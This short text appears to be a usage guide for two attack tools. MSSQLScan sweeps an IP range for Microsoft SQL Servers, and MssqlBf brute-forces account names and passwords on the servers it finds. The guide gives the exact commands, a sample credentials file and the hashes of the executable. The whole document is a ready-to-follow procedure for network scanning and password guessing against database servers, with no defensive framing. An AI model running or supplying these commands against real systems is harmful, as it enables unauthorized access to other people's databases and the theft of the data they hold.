First, scan for Microsoft SQL Servers using MSSQLScan: MSSQLScan -t 10.1.1.* -o mssql_servers.txt
When the scan is complete you can use MssqlBf to bruteforce valid accounts and passwords on the servers found. Before starting to bruteforce, you need to prepare a list of credentials in a file.
In this example, the credentials file is called creds.txt and contains:
user1;
user2;user2password
Now we have servers and credentials we would like to try, start the bruteforce using e.g.: MssqlBf /cf creds.txt /si mssql_servers.txt
632AD4F449B58EE1E362FCF34AC749F5 MD5 MssqlBf.exe
1CBF86048D54A8FB058DBD205878F6581C853CBE SHA1 MssqlBf.exe
